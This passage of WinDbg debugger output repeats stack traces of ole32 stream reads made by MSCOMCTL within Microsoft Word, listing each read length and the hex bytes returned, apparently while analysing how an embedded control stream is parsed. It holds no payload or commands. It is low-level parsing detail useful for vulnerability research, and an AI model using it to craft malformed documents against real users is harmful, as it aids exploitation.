0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
0030a968 02 00 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a944 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a96c 275e7306 MSCOMCTL!DllGetClassObject+0x41a74
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xff4
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
05e0efb8 01 00 ..
ReadLength = 0x2
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a944 275c87ed ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a96c 275e7306 MSCOMCTL!DllGetClassObject+0x41aa9
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xff4
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
00313334 64adf54e wwlib!DllGetClassObject+0x5b213
00313378 65878487 wwlib!DllGetClassObject+0x5a904
27632368 00 00 ..
ReadLength = 0x2
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a8ec 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a914 275c89df MSCOMCTL!DllGetClassObject+0x41a42
0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41c9b
0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
0030a910 0c 00 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a8ec 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a914 275c89df MSCOMCTL!DllGetClassObject+0x41a74
0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41c9b
0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
0d511db0 43 6f 62 6a 64 00 00 00-82 82 00 00 Cobjd.......
ReadLength = 0xc
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a8ec 275c87ed ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a914 275c89df MSCOMCTL!DllGetClassObject+0x41aa9
0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41c9b
0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
ReadLength = 0x0
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a8ec 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a914 275c8a0a MSCOMCTL!DllGetClassObject+0x41a42
0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41cc6
0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
0030a910 82 82 00 00 ....
ReadLength = 0x4
--------------------------------------------------------------------------------------------------------------
ChildEBP RetAddr
0030a8ec 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]
WARNING: Stack unwind information not available. Following frames may be wrong.
0030a914 275c8a0a MSCOMCTL!DllGetClassObject+0x41a74
0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41cc6
0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08
0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f
0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72
0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4
0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31
0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2
0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602
0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e
0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665
0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a
0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0
0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9
00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b
003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4
00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684
00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8
00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac
0d494cd0 00 00 00 00 00 00 00 00-00 00 00 00 30 3c 58 27 ............0